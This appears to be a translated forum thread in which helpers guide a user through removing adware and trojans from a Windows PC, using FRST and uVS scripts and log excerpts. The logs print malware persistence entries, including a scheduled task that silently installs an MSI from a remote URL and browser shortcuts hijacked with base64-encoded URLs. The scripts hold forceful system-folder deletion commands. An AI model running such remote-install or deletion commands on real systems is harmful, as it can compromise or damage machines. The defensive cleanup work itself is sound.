Tried it. Didn't help!
To start the desktop, the Win+R key combination with the explorer command may work.
I "killed" one process in Task Manager and the desktop started.
What about AdwCleaner? Safe Mode with Networking?
start
CreateRestorePoint:
Hosts:
() C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\prot7283426f-3046-4086-8ed8-c538d3ea43f7.tmpfs
() C:\Windows\Temp\gD106.tmp.exe
() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
() C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\knsB0A8.tmp
() C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\knsB0A8.tmp
() C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
C:\Program Files (x86)\UCBrowser\
(IEC) C:\Program Files (x86)\BikaQRssReader\BikaQ.exe
C:\Program Files (x86)\BikaQRssReader\
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks]
HKLM\...\Providers\x9leisov: C:\Program Files (x86)\Sherset Community\local64spl.dll [308224 2017-02-20] ()
ShellExecuteHooks: No Name - {EE208D6E-F444-11E6-AF06-64006A5CFC23} - C:\Program Files (x86)\Erniedkfack\Atodersqtation.dll [146432 2017-02-20] ()
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\їмС№\X64\KZipShell.dll [2017-02-20] ()
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicy\User: Restriction <======= ATTENTION
R2 vutobowi; C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\knsB0A8.tmp [416768 2017-02-21] () [File not signed]
R2 gemeloki; C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\prot7283426f-3046-4086-8ed8-c538d3ea43f7.tmpfs [X]
S2 serverss; C:\Windows\Temp\A21B.tmp [X]
U1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
Task: {081F77CB-6B87-42A8-AEFC-DAEEC7783758} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {4333E581-AB34-4C06-8DE2-5AC339C2B343} - System32\Tasks\4646I82I85L1330 => Rundll32.exe "C:\ProgramData\4646I82I85L1330\4646I82I85L1330.dll",IILUsWWZ <==== ATTENTION
Task: {523D330A-7CC3-4652-BEBB-3F7A87D5EA7F} - \{7F0F7E47-0C0C-0F7D-7D11-7E0A7D08117E} -> No File <==== ATTENTION
Task: {6A79DAD2-6B03-4EB3-827B-366C350ED8AA} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {6E89844D-9E0F-4B49-9F24-B3C4545005BE} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-02-20] (UC Web Inc.) <==== ATTENTION
Task: {9F3ED6BC-BD70-40A7-8EDA-A19DE25C3DD4} - System32\Tasks\4646I82I85L1330-dll => Rundll32.exe "C:\ProgramData\4646I82I85L1330\4646I82I85L1330.dll",IILUsWWZ
Task: {B17BFF1B-30F5-4F2C-8AF2-6CEB4F802589} - System32\Tasks\Anuvtain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXMQ01ABD075_4376F86FSXX4376F86FS&v=2017220 /q
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
CMD: RD /S /Q %WinDir%\System32\GroupPolicyUsers
CMD: RD /S /Q %WinDir%\System32\GroupPolicy
CMD: RD /S /Q %WinDir%\SysWOW64\GroupPolicyUsers
CMD: RD /S /Q %WinDir%\SysWOW64\GroupPolicy
CMD: RD /S /Q %WinDir%\SysNative\GroupPolicyUsers
CMD: RD /S /Q %WinDir%\SysNative\GroupPolicy
CMD: gpupdate /force
EmptyTemp:
Reboot:
end
>>> [MASK] "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxJbnRlcm5ldCBFeHBsb3JlclxpZXhwbG9yZS5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [MASK] "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNb3ppbGxhIEZpcmVmb3hcZmlyZWZveC5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [MASK] "C:\Users\Public\Desktop\Моzillа Firеfох.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNb3ppbGxhIEZpcmVmb3hcZmlyZWZveC5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [MASK] "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Моzillа Firеfох.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNb3ppbGxhIEZpcmVmb3hcZmlyZWZveC5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [HTTP] "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk" -> ["C:\Program Files (x86)\Mozilla Firefox\firefox.exe" =>> hxxp://qtipr.com/]
>>> [HTTP] "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk" -> ["C:\Program Files\Internet Explorer\iexplore.exe" =>> hxxp://qtipr.com/]
BikaQ Rss Reader (HKLM-x32\...\{56B2B28A-E663-4D28-84A3-3846068A7D63}) (Version: 1.0.0 - BikaQ)
HPZebra (HKLM-x32\...\HPZebra) (Version: - ) <==== ATTENTION
setupsk (HKU\S-1-5-21-1982386886-4226071709-1876287043-1001\...\setupsk) (Version: - )
trotux - Uninstall (HKLM-x32\...\{96DA9D2E-9C42-4C2F-ACE2-8B3FC4B2106A}) (Version: - ) <==== ATTENTION
;uVS v3.87 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v385c
sreg
exec32 C:\Users\User\AppData\Local\A290AC89-1487696306-11E2-9673-CE39E79C8000\Uninstall.exe
exec32 "C:\Program Files (x86)\PubHotspot\unins000.exe"
exec32 MsiExec.exe /I{F59B0792-442A-467A-B788-6CB01D71A3E7}
dirzooex %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT
dirzooex %SystemRoot%\TEMP
zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487696306-11E2-9673-CE39E79C8000\QNSL4287.TMP
dirzooex %SystemDrive%\PROGRAM FILES\TJ1DD8I6XU
dirzooex %SystemDrive%\PROGRAM FILES\V74XUHMFAL
delall %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT\CXH2MRQ3FC96OQP.EXE
delall %SystemRoot%\TEMP\G4E51.TMP.EXE
delall %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487696306-11E2-9673-CE39E79C8000\QNSL4287.TMP
delall %SystemDrive%\PROGRAM FILES\TJ1DD8I6XU\TJ1DD8I6X.EXE
delall %SystemDrive%\PROGRAM FILES\V74XUHMFAL\V74XUHMFA.EXE
delall %SystemDrive%\PROGRAMDATA\4646I82I85L1330\4646I82I85L1330.DLL
delall %SystemRoot%\TEMP\G492F.TMP
delall %Sys32%\DRIVERS\69076356.SYS
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:UCDRV-X64.SYS
delref HTTP://GO.MAIL.RU/DISTIB/EP/?PRODUCT_ID=%7BC5875683-749B-443B-B421-619BE15BEB8A%7D&GP=812254
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNS80DA.TMP
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNSB0A8.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNS80DA.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNSB0A8.TMP
zoo %SystemDrive%\PROGRAM FILES (X86)\SHERSET COMMUNITY\LOCAL64SPL.DLL
delall %SystemDrive%\PROGRAM FILES (X86)\SHERSET COMMUNITY\LOCAL64SPL.DLL
zoo %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK\MGLOBAL.DLL
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PRO80EA.TMP
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PROT7283426F-3046-4086-8ED8-C538D3EA43F7.TMPFS
zoo %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT\PUBLICHOTSPOT.EXE
zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487687553-11E2-9673-CE39E79C8000\QNSFC037.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PRO80EA.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PROT7283426F-3046-4086-8ED8-C538D3EA43F7.TMPFS
delall %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT\PUBLICHOTSPOT.EXE
delall %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487687553-11E2-9673-CE39E79C8000\QNSFC037.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X64
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X86
delall %SystemDrive%\PROGRAM FILES (X86)\BIKAQRSSREADER\BIKAQ.EXE
delall %SystemDrive%\USERS\USER\APPDATA\ROAMING\SETUPSK\PYTHON\PYTHONW.EXE
dirzooex %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK
delall %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK\ATODERSQTATION.DLL
delall %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delall %SystemDrive%\PROGRAM FILES\MY WEB SHIELD\MWESHIELDUP.EXE
delall %SystemDrive%\PROGRAM FILES (X86)\VK OK ADBLOCK\IEEF\W0YBNT.EXE
delref KUAIZIP SHELL EXTENSION\[CLSID]
delall %Sys32%\DRIVERS:UCDRV-X64.SYS
delall %Sys32%\DRIVERS:X64
delall %Sys32%\DRIVERS:X86
delall %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK\MGLOBAL.DLL
areg
deltmp
czoo
restart
;uVS v3.87.9 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v388c
BREG
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY\UCLAUNCHER.EXE
bl 475F9188B279C0A7014394B98EB143BB 743824
addsgn BA6F9BB2BDFD44720B9C2D754C2120FBDA75303AC9A957FB69E38D3789E5B8B3369CBA523E1D1682D495FEE64316B6EF99A8ED721D5178962473A4EF8F85E653 8 UC Web
zoo %Sys32%\DRIVERS:X64
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X64
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY\UCLAUNCHER-X64.EXE
zoo %Sys32%\DRIVERS:UCDRV-X64.SYS
bl BC380DF77F023D410466676FA5A27E3C 50888
delall %Sys32%\DRIVERS:UCDRV-X64.SYS
zoo %Sys32%\DRIVERS:X86
bl BA052C285D77745342B6DDC6BE0873C3 607120
delall %Sys32%\DRIVERS:X86
zoo %SystemDrive%\PROGRAM FILES (X86)\MIO\MIO.EXE
bl 41E928AF129C0583D2EB8C13A6CAEE64 331368
delall %SystemDrive%\PROGRAM FILES (X86)\MIO\MIO.EXE
addsgn 1A26069A5583C58CF42B254E3143FE8E60825F4EDBB81F2546483AE9DB3A201ADC227B057C55625C4F30C59FCDE6C2BF755A2807433202292D77CE39998F129B 64 AdWare.Win32.ConvertAd.bbhf [Kaspersky]
zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487768701-11E2-9673-CE39E79C8000\QNSC2EB6.TMP
bl 542199EC8FAA7CB170B8F663D62ADA99 158720
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:UCDRV-X64.SYS
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:UCDRV-X64.SYS
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X86
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X86
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UCSERVICE.EXE
bl 0B3D1E968E53563C0DD97F4B348FBA7E 597208
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UCSERVICE.EXE
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UPDATE_TASK.EXE
bl AB85F66781614C444A165F6420972736 483032
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UPDATE_TASK.EXE
delall %SystemDrive%\PROGRAMDATA\4646I82I85L1330\4646I82I85L1330.DLL
chklst
delvir
czoo
restart
The files quarantine.zip and/or virusinfo_cure.zip (no others are accepted).
Send the resulting archive using this form
to this mailbox: quarantine <at> safezone.cc (replace <at> with @)
start
CreateRestorePoint:
FF Keyword.URL: Mozilla\Firefox\Profiles\uzqjs7p7.default ->
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\uzqjs7p7.default\searchplugins\087yviit.xml [2017-02-21]
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\uzqjs7p7.default\searchplugins\x9leisov.xml [2017-02-20]
CHR HKLM-x32\...\Chrome\Extension: [lkemddiljapcmhicklfpcbpfffahfbja] - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\extensions\WebNavigation.crx [2014-09-18]
R2 WinSnare; C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll [779264 2017-02-22] (InterSect Alliance Pty Ltd) [File not signed]
C:\Users\User\AppData\Roaming\WinSnare\
R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
C:\Program Files (x86)\UCBrowser\
2017-02-22 12:59 - 2017-02-22 16:46 - 00000000 ____D C:\Program Files (x86)\MIO
2017-02-22 12:59 - 2017-02-22 14:04 - 00000000 ____D C:\Program Files (x86)\BikaQRssReader
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSnare
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSAPSvc
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BikaQ
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.1.4)
2017-02-22 12:58 - 2017-02-22 12:58 - 00000000 ____D C:\Program Files (x86)\087yviit
2017-02-22 09:54 - 2017-02-22 09:54 - 00000000 ____D C:\Users\User\AppData\Roaming\Reazowardlaqule
2017-02-22 09:54 - 2017-02-22 09:54 - 00000000 ____D C:\Users\User\AppData\Roaming\Pilertain
2017-02-21 16:58 - 2017-02-22 14:06 - 00000000 ____D C:\Program Files (x86)\Ghabuty
2017-02-21 16:58 - 2017-02-22 14:03 - 00000000 ____D C:\Program Files\V74XUHMFAL
2017-02-21 16:58 - 2017-02-22 14:03 - 00000000 ____D C:\Program Files\TJ1DD8I6XU
2017-02-21 16:58 - 2017-02-22 14:02 - 00000000 ____D C:\Program Files (x86)\PubHotspot
2017-02-21 16:58 - 2017-02-21 16:58 - 00006056 _____ C:\Windows\System32\Tasks\Biveingcoerpy Mapper
2017-02-21 16:58 - 2017-02-21 16:58 - 00000000 ____D C:\Users\User\AppData\Local\Reecik
2017-02-21 16:58 - 2017-02-21 16:58 - 00000000 ____D C:\Program Files (x86)\Biveingcoerpy Mapper
2017-02-21 16:30 - 2017-02-22 11:40 - 00000000 ____D C:\Users\User\AppData\Roaming\KuaiZip
2017-02-21 14:32 - 2017-02-22 14:04 - 00000000 ____D C:\Users\User\AppData\Local\A290AC89-1487687553-11E2-9673-CE39E79C8000
2017-02-20 08:26 - 2017-02-20 08:26 - 00000853 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\їмС№.lnk
2017-02-20 08:26 - 2017-02-20 08:26 - 00000000 ____D C:\Program Files\їмС№
2017-02-20 08:18 - 2017-02-20 08:18 - 00000000 ____D C:\Users\User\AppData\Local\UCBrowser
2017-02-20 08:18 - 2017-02-20 08:18 - 00000000 ____D C:\Program Files (x86)\Maoha
2017-02-20 08:16 - 2017-02-20 08:16 - 01906859 _____ C:\Users\User\AppData\Roaming\MoveLotex.tst
2017-02-20 08:15 - 2017-02-20 08:15 - 00278518 _____ C:\Users\User\AppData\Roaming\Reex.bin
2017-02-20 08:14 - 2017-02-20 21:22 - 00000000 ____D C:\Program Files (x86)\xxx
2017-02-20 08:13 - 2017-02-22 14:04 - 00000000 ____D C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244
2017-02-20 07:56 - 2017-02-22 14:04 - 00000000 ____D C:\Program Files (x86)\Sherset Community
2017-02-20 07:56 - 2017-02-20 07:56 - 00006000 _____ C:\Windows\System32\Tasks\Sherset Community
2017-02-20 07:55 - 2017-02-22 14:06 - 00000000 ____D C:\Program Files (x86)\Erniedkfack
2017-02-20 07:55 - 2017-02-20 07:56 - 00000000 ____D C:\Users\User\AppData\Local\Anibeent
2017-02-19 17:09 - 2017-02-22 14:06 - 00000000 ___HD C:\Users\Все пользователи\4646I82I85L1330
2017-02-19 17:09 - 2017-02-22 14:06 - 00000000 ___HD C:\ProgramData\4646I82I85L1330
2017-02-19 17:09 - 2017-02-19 17:09 - 01662464 _____ (Microsoft Corporation) C:\Windows\csrss.exe
2017-02-19 17:09 - 2017-02-19 17:09 - 00364088 _____ (NVIDIA Corporation) C:\Windows\cudart64_80.dll
2017-02-19 17:09 - 2017-02-19 17:09 - 00278016 _____ (The cURL library, hxxp://curl.haxx.se/) C:\Windows\libcurl.dll
2017-02-19 17:09 - 2017-02-19 17:09 - 00177152 _____ C:\Windows\svchost.exe
2017-02-19 17:09 - 2017-02-19 17:09 - 00021504 _____ C:\Windows\OpenCL.dll
2017-02-19 17:08 - 2017-02-19 17:08 - 00073216 _____ C:\Windows\taskmgr.exe
C:\Windows\svchost.exe
ATTENTION ====> Check for partition/boot infection.
Task: {129734AE-8887-46E4-8A0C-D1B86BAD134F} - \setupsk -> No File <==== ATTENTION
Task: {156404EB-EA74-47DD-B54E-79845916954C} - \UCBrowserSecureUpdater -> No File <==== ATTENTION
Task: {39FFB663-1C57-4291-9422-28ACD352BA34} - \BikaQ_FetchAndUpgrade_CanBeDel -> No File <==== ATTENTION
Task: {5BA2A482-08DA-47F4-A001-EF8BACF601A2} - System32\Tasks\Sherset Community => C:\Program Files (x86)\Erniedkfack\grikery.exe [2017-02-20] (Glarysoft Ltd)
Task: {771BF1D5-9E3D-4B60-960F-7599C3196EA0} - \4646I82I85L1330 -> No File <==== ATTENTION
Task: {A069D5F9-E687-4795-A0B8-0450F357C872} - \clearlnk -> No File <==== ATTENTION
Task: {A420BA93-981F-4D1F-A22F-B196C036A6EB} - System32\Tasks\Biveingcoerpy Mapper => C:\Program Files (x86)\Ghabuty\marck.exe [2017-02-21] (Glarysoft Ltd)
Task: {BB9C887F-6D3C-4B06-893E-21ED823DB7AA} - \4646I82I85L1330-dll -> No File <==== ATTENTION
Task: {DAEC6D7A-21CE-4EA0-A50F-0DE652DB3DD1} - \Milimili -> No File <==== ATTENTION
Task: {EC5BCA6F-4D70-4B7B-B795-D8BE08AC4383} - \setupsk2 -> No File <==== ATTENTION
Task: {F3F37FFA-C4F5-40B5-896E-64D2AFDB1A7B} - \marck -> No File <==== ATTENTION
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\їмС№.lnk -> C:\Program Files\їмС№\X86\KuaiZip.exe () <===== Cyrillic
2017-02-20 08:26 - 2017-02-20 08:26 - 00524696 _____ () C:\Program Files\їмС№\X64\KZipShell.dll
EmptyTemp:
Reboot:
end